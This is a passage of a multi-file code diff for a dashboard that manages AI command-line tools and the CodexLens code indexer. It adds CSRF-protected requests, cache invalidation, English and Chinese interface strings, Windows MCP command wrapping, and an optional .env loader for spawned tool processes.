descKey: 'mcp.exa.field.apiKey.desc'
|
||||
}
|
||||
],
|
||||
// Uses buildCrossPlatformMcpConfig for automatic Windows cmd /c wrapping
|
||||
buildConfig: (values) => {
|
||||
const config = {
|
||||
command: 'npx',
|
||||
args: ['-y', 'exa-mcp-server']
|
||||
};
|
||||
// Only add env if API key is provided
|
||||
if (values.apiKey) {
|
||||
config.env = { EXA_API_KEY: values.apiKey };
|
||||
}
|
||||
return config;
|
||||
const env = values.apiKey ? { EXA_API_KEY: values.apiKey } : undefined;
|
||||
return buildCrossPlatformMcpConfig('npx', ['-y', 'exa-mcp-server'], { env });
|
||||
}
|
||||
}
|
||||
];
|
||||
|
||||
@@ -415,10 +415,15 @@ function handleNotification(data) {
|
||||
'CodexLens'
|
||||
);
|
||||
}
|
||||
// Invalidate CodexLens page cache to ensure fresh data on next visit
|
||||
// Invalidate all CodexLens related caches to ensure fresh data on refresh
|
||||
// Must clear both codexlens-specific cache AND global status cache
|
||||
if (window.cacheManager) {
|
||||
window.cacheManager.invalidate('all-status');
|
||||
window.cacheManager.invalidate('dashboard-init');
|
||||
}
|
||||
if (typeof window.invalidateCodexLensCache === 'function') {
|
||||
window.invalidateCodexLensCache();
|
||||
console.log('[CodexLens] Cache invalidated after installation');
|
||||
console.log('[CodexLens] All caches invalidated after installation');
|
||||
}
|
||||
// Refresh CLI status if active
|
||||
if (typeof loadCodexLensStatus === 'function') {
|
||||
@@ -443,10 +448,15 @@ function handleNotification(data) {
|
||||
'CodexLens'
|
||||
);
|
||||
}
|
||||
// Invalidate CodexLens page cache to ensure fresh data on next visit
|
||||
// Invalidate all CodexLens related caches to ensure fresh data on refresh
|
||||
// Must clear both codexlens-specific cache AND global status cache
|
||||
if (window.cacheManager) {
|
||||
window.cacheManager.invalidate('all-status');
|
||||
window.cacheManager.invalidate('dashboard-init');
|
||||
}
|
||||
if (typeof window.invalidateCodexLensCache === 'function') {
|
||||
window.invalidateCodexLensCache();
|
||||
console.log('[CodexLens] Cache invalidated after uninstallation');
|
||||
console.log('[CodexLens] All caches invalidated after uninstallation');
|
||||
}
|
||||
// Refresh CLI status if active
|
||||
if (typeof loadCodexLensStatus === 'function') {
|
||||
|
||||
@@ -415,7 +415,7 @@ async function cleanProjectStorage(projectId) {
|
||||
}
|
||||
|
||||
try {
|
||||
const res = await fetch('/api/storage/clean', {
|
||||
const res = await csrfFetch('/api/storage/clean', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({ projectId })
|
||||
@@ -451,7 +451,7 @@ async function cleanAllStorageConfirm() {
|
||||
}
|
||||
|
||||
try {
|
||||
const res = await fetch('/api/storage/clean', {
|
||||
const res = await csrfFetch('/api/storage/clean', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({ all: true })
|
||||
|
||||
@@ -568,7 +568,7 @@ async function executeSidebarUpdateTask(taskId) {
|
||||
}
|
||||
|
||||
try {
|
||||
const response = await fetch('/api/update-claude-md', {
|
||||
const response = await csrfFetch('/api/update-claude-md', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({
|
||||
|
||||
@@ -261,6 +261,13 @@ const i18n = {
|
||||
'cli.wrapper': 'Wrapper',
|
||||
'cli.customClaudeSettings': 'Custom Claude CLI settings',
|
||||
'cli.updateFailed': 'Failed to update',
|
||||
|
||||
// CLI Tool Config - Environment File
|
||||
'cli.envFile': 'Environment File',
|
||||
'cli.envFileOptional': '(optional)',
|
||||
'cli.envFilePlaceholder': 'Path to .env file (e.g., ~/.gemini-env or C:/Users/xxx/.env)',
|
||||
'cli.envFileHint': 'Load environment variables (e.g., API keys) before CLI execution. Supports ~ for home directory.',
|
||||
'cli.envFileBrowse': 'Browse',
|
||||
|
||||
// CodexLens Configuration
|
||||
'codexlens.config': 'CodexLens Configuration',
|
||||
@@ -294,6 +301,7 @@ const i18n = {
|
||||
'codexlens.envGroup.reranker': 'Reranker Configuration',
|
||||
'codexlens.envGroup.concurrency': 'Concurrency Settings',
|
||||
'codexlens.envGroup.cascade': 'Cascade Search Settings',
|
||||
'codexlens.envGroup.chunking': 'Chunking Options',
|
||||
'codexlens.envGroup.llm': 'LLM Features',
|
||||
// Environment variable field labels
|
||||
'codexlens.envField.backend': 'Backend',
|
||||
@@ -313,6 +321,10 @@ const i18n = {
|
||||
'codexlens.envField.searchStrategy': 'Search Strategy',
|
||||
'codexlens.envField.coarseK': 'Coarse K (1st stage)',
|
||||
'codexlens.envField.fineK': 'Fine K (final)',
|
||||
'codexlens.envField.stripComments': 'Strip Comments',
|
||||
'codexlens.envField.stripDocstrings': 'Strip Docstrings',
|
||||
'codexlens.envField.testFilePenalty': 'Test File Penalty',
|
||||
'codexlens.envField.docstringWeight': 'Docstring Weight',
|
||||
'codexlens.usingApiReranker': 'Using API Reranker',
|
||||
'codexlens.currentModel': 'Current Model',
|
||||
'codexlens.localModels': 'Local Models',
|
||||
@@ -990,6 +1002,12 @@ const i18n = {
|
||||
'mcp.clickToEdit': 'Click to edit',
|
||||
'mcp.clickToViewDetails': 'Click to view details',
|
||||
|
||||
// Windows MCP Compatibility
|
||||
'mcp.windows.title': 'Windows Compatibility Warning',
|
||||
'mcp.windows.compatibilityWarning': 'The MCP server "{name}" uses "{command}" which requires "cmd /c" wrapper on Windows to work properly with Claude Code.',
|
||||
'mcp.windows.autoFix': 'Auto-fix (Recommended)',
|
||||
'mcp.windows.keepOriginal': 'Keep Original',
|
||||
|
||||
// Hook Manager
|
||||
'hook.projectHooks': 'Project Hooks',
|
||||
'hook.projectFile': '.claude/settings.json',
|
||||
@@ -2410,6 +2428,13 @@ const i18n = {
|
||||
'cli.wrapper': '封装',
|
||||
'cli.customClaudeSettings': '自定义 Claude CLI 配置',
|
||||
'cli.updateFailed': '更新失败',
|
||||
|
||||
// CLI 工具配置 - 环境文件
|
||||
'cli.envFile': '环境文件',
|
||||
'cli.envFileOptional': '(可选)',
|
||||
'cli.envFilePlaceholder': '.env 文件路径(如 ~/.gemini-env 或 C:/Users/xxx/.env)',
|
||||
'cli.envFileHint': '在 CLI 执行前加载环境变量(如 API 密钥)。支持 ~ 表示用户目录。',
|
||||
'cli.envFileBrowse': '浏览',
|
||||
|
||||
// CodexLens 配置
|
||||
'codexlens.config': 'CodexLens 配置',
|
||||
@@ -2443,6 +2468,7 @@ const i18n = {
|
||||
'codexlens.envGroup.reranker': '重排序配置',
|
||||
'codexlens.envGroup.concurrency': '并发设置',
|
||||
'codexlens.envGroup.cascade': '级联搜索设置',
|
||||
'codexlens.envGroup.chunking': '分块选项',
|
||||
'codexlens.envGroup.llm': 'LLM 功能',
|
||||
// 环境变量字段标签
|
||||
'codexlens.envField.backend': '后端',
|
||||
@@ -2462,6 +2488,10 @@ const i18n = {
|
||||
'codexlens.envField.searchStrategy': '搜索策略',
|
||||
'codexlens.envField.coarseK': '粗筛 K (第一阶段)',
|
||||
'codexlens.envField.fineK': '精筛 K (最终)',
|
||||
'codexlens.envField.stripComments': '去除注释',
|
||||
'codexlens.envField.stripDocstrings': '去除文档字符串',
|
||||
'codexlens.envField.testFilePenalty': '测试文件惩罚',
|
||||
'codexlens.envField.docstringWeight': '文档字符串权重',
|
||||
'codexlens.usingApiReranker': '使用 API 重排序',
|
||||
'codexlens.currentModel': '当前模型',
|
||||
'codexlens.localModels': '本地模型',
|
||||
@@ -3118,6 +3148,12 @@ const i18n = {
|
||||
'mcp.clickToEdit': '点击编辑',
|
||||
'mcp.clickToViewDetails': '点击查看详情',
|
||||
|
||||
// Windows MCP 兼容性
|
||||
'mcp.windows.title': 'Windows 兼容性警告',
|
||||
'mcp.windows.compatibilityWarning': 'MCP 服务器 "{name}" 使用的 "{command}" 命令需要在 Windows 上添加 "cmd /c" 包装才能与 Claude Code 正常工作。',
|
||||
'mcp.windows.autoFix': '自动修复(推荐)',
|
||||
'mcp.windows.keepOriginal': '保持原样',
|
||||
|
||||
// Hook Manager
|
||||
'hook.projectHooks': '项目钩子',
|
||||
'hook.projectFile': '.claude/settings.json',
|
||||
|
||||
@@ -523,6 +523,27 @@ function buildToolConfigModalContent(tool, config, models, status) {
|
||||
'</div>' +
|
||||
'</div>' +
|
||||
|
||||
// Environment File Section (only for builtin tools: gemini, qwen)
|
||||
(tool === 'gemini' || tool === 'qwen' ? (
|
||||
'<div class="tool-config-section">' +
|
||||
'<h4><i data-lucide="file-key" class="w-3.5 h-3.5"></i> ' + t('cli.envFile') + ' <span class="text-muted">' + t('cli.envFileOptional') + '</span></h4>' +
|
||||
'<div class="env-file-input-group">' +
|
||||
'<div class="env-file-input-row">' +
|
||||
'<input type="text" id="envFileInput" class="tool-config-input" ' +
|
||||
'placeholder="' + t('cli.envFilePlaceholder') + '" ' +
|
||||
'value="' + (config.envFile ? escapeHtml(config.envFile) : '') + '" />' +
|
||||
'<button type="button" class="btn-sm btn-outline" id="envFileBrowseBtn">' +
|
||||
'<i data-lucide="folder-open" class="w-3.5 h-3.5"></i> ' + t('cli.envFileBrowse') +
|
||||
'</button>' +
|
||||
'</div>' +
|
||||
'<p class="env-file-hint">' +
|
||||
'<i data-lucide="info" class="w-3 h-3"></i> ' +
|
||||
t('cli.envFileHint') +
|
||||
'</p>' +
|
||||
'</div>' +
|
||||
'</div>'
|
||||
) : '') +
|
||||
|
||||
// Footer
|
||||
'<div class="tool-config-footer">' +
|
||||
'<button class="btn btn-outline" onclick="closeModal()">' + t('common.cancel') + '</button>' +
|
||||
@@ -701,12 +722,23 @@ function initToolConfigModalEvents(tool, currentConfig, models) {
|
||||
return;
|
||||
}
|
||||
|
||||
// Get envFile value (only for gemini/qwen)
|
||||
var envFileInput = document.getElementById('envFileInput');
|
||||
var envFile = envFileInput ? envFileInput.value.trim() : '';
|
||||
|
||||
try {
|
||||
await updateCliToolConfig(tool, {
|
||||
var updateData = {
|
||||
primaryModel: primaryModel,
|
||||
secondaryModel: secondaryModel,
|
||||
tags: currentTags
|
||||
});
|
||||
};
|
||||
|
||||
// Only include envFile for gemini/qwen tools
|
||||
if (tool === 'gemini' || tool === 'qwen') {
|
||||
updateData.envFile = envFile || null;
|
||||
}
|
||||
|
||||
await updateCliToolConfig(tool, updateData);
|
||||
// Reload config to reflect changes
|
||||
await loadCliToolConfig();
|
||||
showRefreshToast('Configuration saved', 'success');
|
||||
@@ -719,6 +751,44 @@ function initToolConfigModalEvents(tool, currentConfig, models) {
|
||||
};
|
||||
}
|
||||
|
||||
// Environment file browse button (only for gemini/qwen)
|
||||
var envFileBrowseBtn = document.getElementById('envFileBrowseBtn');
|
||||
if (envFileBrowseBtn) {
|
||||
envFileBrowseBtn.onclick = async function() {
|
||||
try {
|
||||
// Use file dialog API if available
|
||||
var response = await fetch('/api/dialog/open-file', {
|
||||
method: 'POST',
|
||||
headers: { 'Content-Type': 'application/json' },
|
||||
body: JSON.stringify({
|
||||
title: t('cli.envFile'),
|
||||
filters: [
|
||||
{ name: 'Environment Files', extensions: ['env'] },
|
||||
{ name: 'All Files', extensions: ['*'] }
|
||||
],
|
||||
defaultPath: ''
|
||||
})
|
||||
});
|
||||
|
||||
if (response.ok) {
|
||||
var data = await response.json();
|
||||
if (data.filePath) {
|
||||
var envFileInput = document.getElementById('envFileInput');
|
||||
if (envFileInput) {
|
||||
envFileInput.value = data.filePath;
|
||||
}
|
||||
}
|
||||
} else {
|
||||
// Fallback: prompt user to enter path manually
|
||||
showRefreshToast('File dialog not available. Please enter path manually.', 'info');
|
||||
}
|
||||
} catch (err) {
|
||||
console.error('Failed to open file dialog:', err);
|
||||
showRefreshToast('File dialog not available. Please enter path manually.', 'info');
|
||||
}
|
||||
};
|
||||
}
|
||||
|
||||
// Initialize lucide icons in modal
|
||||
if (window.lucide) lucide.createIcons();
|
||||
}
|
||||
@@ -2752,7 +2822,7 @@ async function installSemanticDeps() {
|
||||
'<div class="text-sm text-muted-foreground animate-pulse">' + t('codexlens.installingDeps') + '</div>';
|
||||
|
||||
try {
|
||||
var response = await fetch('/api/codexlens/semantic/install', { method: 'POST' });
|
||||
var response = await csrfFetch('/api/codexlens/semantic/install', { method: 'POST' });
|
||||
var result = await response.json();
|
||||
|
||||
if (result.success) {
|
||||
|
||||
@@ -72,6 +72,10 @@ function invalidateCache(key) {
|
||||
Object.values(CACHE_KEY_MAP).forEach(function(k) {
|
||||
window.cacheManager.invalidate(k);
|
||||
});
|
||||
// 重要:同时清理包含 CodexLens 状态的全局缓存
|
||||
// 这些缓存在 cli-status.js 中使用,包含 codexLens.ready 状态
|
||||
window.cacheManager.invalidate('all-status');
|
||||
window.cacheManager.invalidate('dashboard-init');
|
||||
}
|
||||
}
|
||||
|
||||
@@ -788,6 +792,12 @@ function initCodexLensConfigEvents(currentConfig) {
|
||||
|
||||
if (result.success) {
|
||||
showRefreshToast(t('codexlens.configSaved'), 'success');
|
||||
|
||||
// Invalidate config cache to ensure fresh data on next load
|
||||
if (window.cacheManager) {
|
||||
window.cacheManager.invalidate('codexlens-config');
|
||||
}
|
||||
|
||||
closeModal();
|
||||
|
||||
// Refresh CodexLens status
|
||||
@@ -1109,6 +1119,16 @@ var ENV_VAR_GROUPS = {
|
||||
'CODEXLENS_CASCADE_COARSE_K': { labelKey: 'codexlens.envField.coarseK', type: 'number', placeholder: '100', default: '100', settingsPath: 'cascade.coarse_k', min: 10, max: 500 },
|
||||
'CODEXLENS_CASCADE_FINE_K': { labelKey: 'codexlens.envField.fineK', type: 'number', placeholder: '10', default: '10', settingsPath: 'cascade.fine_k', min: 1, max: 100 }
|
||||
}
|
||||
},
|
||||
chunking: {
|
||||
labelKey: 'codexlens.envGroup.chunking',
|
||||
icon: 'scissors',
|
||||
vars: {
|
||||
'CHUNK_STRIP_COMMENTS': { labelKey: 'codexlens.envField.stripComments', type: 'select', options: ['true', 'false'], default: 'true', settingsPath: 'chunking.strip_comments' },
|
||||
'CHUNK_STRIP_DOCSTRINGS': { labelKey: 'codexlens.envField.stripDocstrings', type: 'select', options: ['true', 'false'], default: 'true', settingsPath: 'chunking.strip_docstrings' },
|
||||
'RERANKER_TEST_FILE_PENALTY': { labelKey: 'codexlens.envField.testFilePenalty', type: 'number', placeholder: '0.0', default: '0.0', settingsPath: 'reranker.test_file_penalty', min: 0, max: 1, step: 0.1 },
|
||||
'RERANKER_DOCSTRING_WEIGHT': { labelKey: 'codexlens.envField.docstringWeight', type: 'number', placeholder: '1.0', default: '1.0', settingsPath: 'reranker.docstring_weight', min: 0, max: 1, step: 0.1 }
|
||||
}
|
||||
}
|
||||
};
|
||||
|
||||
@@ -3603,7 +3623,7 @@ async function initCodexLensIndex(indexType, embeddingModel, embeddingBackend, m
|
||||
// Install semantic dependencies first
|
||||
showRefreshToast(t('codexlens.installingDeps') || 'Installing semantic dependencies...', 'info');
|
||||
try {
|
||||
var installResponse = await fetch('/api/codexlens/semantic/install', { method: 'POST' });
|
||||
var installResponse = await csrfFetch('/api/codexlens/semantic/install', { method: 'POST' });
|
||||
var installResult = await installResponse.json();
|
||||
|
||||
if (!installResult.success) {
|
||||
@@ -5373,9 +5393,9 @@ function initCodexLensManagerPageEvents(currentConfig) {
|
||||
saveBtn.disabled = true;
|
||||
saveBtn.innerHTML = '<span class="animate-pulse">' + t('common.saving') + '</span>';
|
||||
try {
|
||||
var response = await fetch('/api/codexlens/config', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ index_dir: newIndexDir }) });
|
||||
var response = await csrfFetch('/api/codexlens/config', { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ index_dir: newIndexDir }) });
|
||||
var result = await response.json();
|
||||
if (result.success) { showRefreshToast(t('codexlens.configSaved'), 'success'); renderCodexLensManager(); }
|
||||
if (result.success) { if (window.cacheManager) { window.cacheManager.invalidate('codexlens-config'); } showRefreshToast(t('codexlens.configSaved'), 'success'); renderCodexLensManager(); }
|
||||
else { showRefreshToast(t('common.saveFailed') + ': ' + result.error, 'error'); }
|
||||
} catch (err) { showRefreshToast(t('common.error') + ': ' + err.message, 'error'); }
|
||||
saveBtn.disabled = false;
|
||||
|
||||
@@ -338,6 +338,14 @@ function renderIssueCard(issue) {
|
||||
${t('issues.boundSolution') || 'Bound'}
|
||||
</span>
|
||||
` : ''}
|
||||
${issue.github_url ? `
|
||||
<a href="${issue.github_url}" target="_blank" rel="noopener noreferrer"
|
||||
class="flex items-center gap-1 text-muted-foreground hover:text-foreground transition-colors"
|
||||
onclick="event.stopPropagation()" title="View on GitHub">
|
||||
<i data-lucide="github" class="w-3.5 h-3.5"></i>
|
||||
${issue.github_number ? `#${issue.github_number}` : 'GitHub'}
|
||||
</a>
|
||||
` : ''}
|
||||
</div>
|
||||
</div>
|
||||
`;
|
||||
|
||||
@@ -1114,7 +1114,7 @@ async function deleteInsight(insightId) {
|
||||
if (!confirm(t('memory.confirmDeleteInsight'))) return;
|
||||
|
||||
try {
|
||||
var response = await fetch('/api/memory/insights/' + insightId, { method: 'DELETE' });
|
||||
var response = await csrfFetch('/api/memory/insights/' + insightId, { method: 'DELETE' });
|
||||
if (!response.ok) throw new Error('Failed to delete insight');
|
||||
|
||||
selectedInsight = null;
|
||||
|
||||
@@ -431,7 +431,7 @@ async function deletePromptInsight(insightId) {
|
||||
if (!confirm(isZh() ? '确定要删除这条洞察记录吗?' : 'Are you sure you want to delete this insight?')) return;
|
||||
|
||||
try {
|
||||
var response = await fetch('/api/memory/insights/' + insightId, { method: 'DELETE' });
|
||||
var response = await csrfFetch('/api/memory/insights/' + insightId, { method: 'DELETE' });
|
||||
if (!response.ok) throw new Error('Failed to delete insight');
|
||||
|
||||
selectedPromptInsight = null;
|
||||
|
||||
@@ -34,6 +34,11 @@ export interface ClaudeCliTool {
|
||||
* Used to lookup endpoint configuration in litellm-api-config.json
|
||||
*/
|
||||
id?: string;
|
||||
/**
|
||||
* Path to .env file for loading environment variables before CLI execution
|
||||
* Supports both absolute paths and paths relative to home directory (e.g., ~/.my-env)
|
||||
*/
|
||||
envFile?: string;
|
||||
}
|
||||
|
||||
export type CliToolName = 'gemini' | 'qwen' | 'codex' | 'claude' | 'opencode' | string;
|
||||
@@ -808,6 +813,7 @@ export function getToolConfig(projectDir: string, tool: string): {
|
||||
primaryModel: string;
|
||||
secondaryModel: string;
|
||||
tags?: string[];
|
||||
envFile?: string;
|
||||
} {
|
||||
const config = loadClaudeCliTools(projectDir);
|
||||
const toolConfig = config.tools[tool];
|
||||
@@ -826,7 +832,8 @@ export function getToolConfig(projectDir: string, tool: string): {
|
||||
enabled: toolConfig.enabled,
|
||||
primaryModel: toolConfig.primaryModel ?? '',
|
||||
secondaryModel: toolConfig.secondaryModel ?? '',
|
||||
tags: toolConfig.tags
|
||||
tags: toolConfig.tags,
|
||||
envFile: toolConfig.envFile
|
||||
};
|
||||
}
|
||||
|
||||
@@ -841,6 +848,7 @@ export function updateToolConfig(
|
||||
primaryModel: string;
|
||||
secondaryModel: string;
|
||||
tags: string[];
|
||||
envFile: string | null;
|
||||
}>
|
||||
): ClaudeCliToolsConfig {
|
||||
const config = loadClaudeCliTools(projectDir);
|
||||
@@ -858,6 +866,14 @@ export function updateToolConfig(
|
||||
if (updates.tags !== undefined) {
|
||||
config.tools[tool].tags = updates.tags;
|
||||
}
|
||||
// Handle envFile: set to undefined if null/empty, otherwise set value
|
||||
if (updates.envFile !== undefined) {
|
||||
if (updates.envFile === null || updates.envFile === '') {
|
||||
delete config.tools[tool].envFile;
|
||||
} else {
|
||||
config.tools[tool].envFile = updates.envFile;
|
||||
}
|
||||
}
|
||||
saveClaudeCliTools(projectDir, config);
|
||||
}
|
||||
|
||||
|
||||
@@ -6,6 +6,9 @@
|
||||
import { z } from 'zod';
|
||||
import type { ToolSchema, ToolResult } from '../types/tool.js';
|
||||
import { spawn, ChildProcess } from 'child_process';
|
||||
import * as fs from 'fs';
|
||||
import * as path from 'path';
|
||||
import * as os from 'os';
|
||||
import { validatePath } from '../utils/path-resolver.js';
|
||||
import { escapeWindowsArg } from '../utils/shell-escape.js';
|
||||
import { buildCommand, checkToolAvailability, clearToolCache, debugLog, errorLog, type NativeResumeConfig, type ToolAvailability } from './cli-executor-utils.js';
|
||||
@@ -82,7 +85,73 @@ import { findEndpointById } from '../config/litellm-api-config-manager.js';
|
||||
|
||||
// CLI Settings (CLI封装) integration
|
||||
import { loadEndpointSettings, getSettingsFilePath, findEndpoint } from '../config/cli-settings-manager.js';
|
||||
import { loadClaudeCliTools } from './claude-cli-tools.js';
|
||||
import { loadClaudeCliTools, getToolConfig } from './claude-cli-tools.js';
|
||||
|
||||
/**
|
||||
* Parse .env file content into key-value pairs
|
||||
* Supports: KEY=value, KEY="value", KEY='value', comments (#), empty lines
|
||||
*/
|
||||
function parseEnvFile(content: string): Record<string, string> {
|
||||
const env: Record<string, string> = {};
|
||||
const lines = content.split(/\r?\n/);
|
||||
|
||||
for (const line of lines) {
|
||||
// Skip empty lines and comments
|
||||
const trimmed = line.trim();
|
||||
if (!trimmed || trimmed.startsWith('#')) continue;
|
||||
|
||||
// Find first = sign
|
||||
const eqIndex = trimmed.indexOf('=');
|
||||
if (eqIndex === -1) continue;
|
||||
|
||||
const key = trimmed.substring(0, eqIndex).trim();
|
||||
let value = trimmed.substring(eqIndex + 1).trim();
|
||||
|
||||
// Remove surrounding quotes if present
|
||||
if ((value.startsWith('"') && value.endsWith('"')) ||
|
||||
(value.startsWith("'") && value.endsWith("'"))) {
|
||||
value = value.slice(1, -1);
|
||||
}
|
||||
|
||||
if (key) {
|
||||
env[key] = value;
|
||||
}
|
||||
}
|
||||
|
||||
return env;
|
||||
}
|
||||
|
||||
/**
|
||||
* Load environment variables from .env file
|
||||
* Supports ~ for home directory expansion
|
||||
*/
|
||||
function loadEnvFile(envFilePath: string): Record<string, string> {
|
||||
try {
|
||||
// Expand ~ to home directory
|
||||
let resolvedPath = envFilePath;
|
||||
if (resolvedPath.startsWith('~')) {
|
||||
resolvedPath = path.join(os.homedir(), resolvedPath.slice(1));
|
||||
}
|
||||
|
||||
// Resolve relative paths
|
||||
if (!path.isAbsolute(resolvedPath)) {
|
||||
resolvedPath = path.resolve(resolvedPath);
|
||||
}
|
||||
|
||||
if (!fs.existsSync(resolvedPath)) {
|
||||
debugLog('ENV_FILE', `Env file not found: ${resolvedPath}`);
|
||||
return {};
|
||||
}
|
||||
|
||||
const content = fs.readFileSync(resolvedPath, 'utf-8');
|
||||
const envVars = parseEnvFile(content);
|
||||
debugLog('ENV_FILE', `Loaded ${Object.keys(envVars).length} env vars from ${resolvedPath}`);
|
||||
return envVars;
|
||||
} catch (err) {
|
||||
errorLog('ENV_FILE', `Failed to load env file: ${envFilePath}`, err as Error);
|
||||
return {};
|
||||
}
|
||||
}
|
||||
|
||||
/**
|
||||
* Execute Claude CLI with custom settings file (CLI封装)
|
||||
@@ -746,6 +815,19 @@ async function executeCliTool(
|
||||
const commandToSpawn = isWindows ? escapeWindowsArg(command) : command;
|
||||
const argsToSpawn = isWindows ? args.map(escapeWindowsArg) : args;
|
||||
|
||||
// Load custom environment variables from envFile if configured (for gemini/qwen)
|
||||
const toolConfig = getToolConfig(workingDir, tool);
|
||||
let customEnv: Record<string, string> = {};
|
||||
if (toolConfig.envFile) {
|
||||
customEnv = loadEnvFile(toolConfig.envFile);
|
||||
}
|
||||
|
||||
// Merge custom env with process.env (custom env takes precedence)
|
||||
const spawnEnv = {
|
||||
...process.env,
|
||||
...customEnv
|
||||
};
|
||||
|
||||
debugLog('SPAWN', `Spawning process`, {
|
||||
command,
|
||||
args,
|
||||
@@ -754,13 +836,16 @@ async function executeCliTool(
|
||||
useStdin,
|
||||
platform: process.platform,
|
||||
fullCommand: `${command} ${args.join(' ')}`,
|
||||
hasCustomEnv: Object.keys(customEnv).length > 0,
|
||||
customEnvKeys: Object.keys(customEnv),
|
||||
...(isWindows ? { escapedCommand: commandToSpawn, escapedArgs: argsToSpawn, escapedFullCommand: `${commandToSpawn} ${argsToSpawn.join(' ')}` } : {})
|
||||
});
|
||||
|
||||
const child = spawn(commandToSpawn, argsToSpawn, {
|
||||
cwd: workingDir,
|
||||
shell: isWindows, // Enable shell on Windows for .cmd files
|
||||
stdio: [useStdin ? 'pipe' : 'ignore', 'pipe', 'pipe']
|
||||
stdio: [useStdin ? 'pipe' : 'ignore', 'pipe', 'pipe'],
|
||||
env: spawnEnv
|
||||
});
|
||||
|
||||
// Track current child process for cleanup on interruption
|
||||
@@ -1190,6 +1275,9 @@ export {
|
||||
* - api-endpoint: Check LiteLLM endpoint configuration exists
|
||||
*/
|
||||
export async function getCliToolsStatus(): Promise<Record<string, ToolAvailability>> {
|
||||
const funcStart = Date.now();
|
||||
debugLog('PERF', 'getCliToolsStatus START');
|
||||
|
||||
// Default built-in tools
|
||||
const builtInTools = ['gemini', 'qwen', 'codex', 'claude', 'opencode'];
|
||||
|
||||
@@ -1202,6 +1290,7 @@ export async function getCliToolsStatus(): Promise<Record<string, ToolAvailabili
|
||||
}
|
||||
let toolsInfo: ToolInfo[] = builtInTools.map(name => ({ name, type: 'builtin' }));
|
||||
|
||||
const configLoadStart = Date.now();
|
||||
try {
|
||||
// Dynamic import to avoid circular dependencies
|
||||
const { loadClaudeCliTools } = await import('./claude-cli-tools.js');
|
||||
@@ -1225,11 +1314,15 @@ export async function getCliToolsStatus(): Promise<Record<string, ToolAvailabili
|
||||
// Fallback to built-in tools if config load fails
|
||||
debugLog('cli-executor', `Using built-in tools (config load failed: ${(e as Error).message})`);
|
||||
}
|
||||
debugLog('PERF', `Config load: ${Date.now() - configLoadStart}ms, tools: ${toolsInfo.length}`);
|
||||
|
||||
const results: Record<string, ToolAvailability> = {};
|
||||
const toolTimings: Record<string, number> = {};
|
||||
|
||||
const checksStart = Date.now();
|
||||
await Promise.all(toolsInfo.map(async (toolInfo) => {
|
||||
const { name, type, enabled, id } = toolInfo;
|
||||
const toolStart = Date.now();
|
||||
|
||||
// Check availability based on tool type
|
||||
if (type === 'cli-wrapper') {
|
||||
@@ -1271,8 +1364,13 @@ export async function getCliToolsStatus(): Promise<Record<string, ToolAvailabili
|
||||
// For builtin: check system PATH availability
|
||||
results[name] = await checkToolAvailability(name);
|
||||
}
|
||||
|
||||
toolTimings[name] = Date.now() - toolStart;
|
||||
}));
|
||||
|
||||
debugLog('PERF', `Tool checks: ${Date.now() - checksStart}ms | Individual: ${JSON.stringify(toolTimings)}`);
|
||||
debugLog('PERF', `getCliToolsStatus TOTAL: ${Date.now() - funcStart}ms`);
|
||||
|
||||
return results;
|
||||
}
|
||||
|
||||
@@ -1520,6 +1618,9 @@ export type { PromptFormat, ConcatOptions } from './cli-prompt-builder.js';
|
||||
// Export utility functions and tool definition for backward compatibility
|
||||
export { executeCliTool, checkToolAvailability, clearToolCache };
|
||||
|
||||
// Export env file utilities for testing
|
||||
export { parseEnvFile, loadEnvFile };
|
||||
|
||||
// Export prompt concatenation utilities
|
||||
export { PromptConcatenator, createPromptConcatenator, buildPrompt, buildMultiTurnPrompt } from './cli-prompt-builder.js';
|
||||
|
||||
|
||||
@@ -49,6 +49,14 @@ interface VenvStatusCache {
|
||||
let venvStatusCache: VenvStatusCache | null = null;
|
||||
const VENV_STATUS_TTL = 5 * 60 * 1000; // 5 minutes TTL
|
||||
|
||||
// Semantic status cache with TTL (same as venv cache)
|
||||
interface SemanticStatusCache {
|
||||
status: SemanticStatus;
|
||||
timestamp: number;
|
||||
}
|
||||
let semanticStatusCache: SemanticStatusCache | null = null;
|
||||
const SEMANTIC_STATUS_TTL = 5 * 60 * 1000; // 5 minutes TTL
|
||||
|
||||
// Track running indexing process for cancellation
|
||||
let currentIndexingProcess: ReturnType<typeof spawn> | null = null;
|
||||
let currentIndexingAborted = false;
|
||||
@@ -147,8 +155,12 @@ function clearVenvStatusCache(): void {
|
||||
* @returns Ready status
|
||||
*/
|
||||
async function checkVenvStatus(force = false): Promise<ReadyStatus> {
|
||||
const funcStart = Date.now();
|
||||
console.log('[PERF][CodexLens] checkVenvStatus START');
|
||||
|
||||
// Use cached result if available and not expired
|
||||
if (!force && venvStatusCache && (Date.now() - venvStatusCache.timestamp < VENV_STATUS_TTL)) {
|
||||
console.log(`[PERF][CodexLens] checkVenvStatus CACHE HIT: ${Date.now() - funcStart}ms`);
|
||||
return venvStatusCache.status;
|
||||
}
|
||||
|
||||
@@ -156,6 +168,7 @@ async function checkVenvStatus(force = false): Promise<ReadyStatus> {
|
||||
if (!existsSync(CODEXLENS_VENV)) {
|
||||
const result = { ready: false, error: 'Venv not found' };
|
||||
venvStatusCache = { status: result, timestamp: Date.now() };
|
||||
console.log(`[PERF][CodexLens] checkVenvStatus (no venv): ${Date.now() - funcStart}ms`);
|
||||
return result;
|
||||
}
|
||||
|
||||
@@ -163,12 +176,16 @@ async function checkVenvStatus(force = false): Promise<ReadyStatus> {
|
||||
if (!existsSync(VENV_PYTHON)) {
|
||||
const result = { ready: false, error: 'Python executable not found in venv' };
|
||||
venvStatusCache = { status: result, timestamp: Date.now() };
|
||||
console.log(`[PERF][CodexLens] checkVenvStatus (no python): ${Date.now() - funcStart}ms`);
|
||||
return result;
|
||||
}
|
||||
|
||||
// Check codexlens is importable
|
||||
// Check codexlens and core dependencies are importable
|
||||
const spawnStart = Date.now();
|
||||
console.log('[PERF][CodexLens] checkVenvStatus spawning Python...');
|
||||
|
||||
return new Promise((resolve) => {
|
||||
const child = spawn(VENV_PYTHON, ['-c', 'import codexlens; print(codexlens.__version__)'], {
|
||||
const child = spawn(VENV_PYTHON, ['-c', 'import codexlens; import watchdog; print(codexlens.__version__)'], {
|
||||
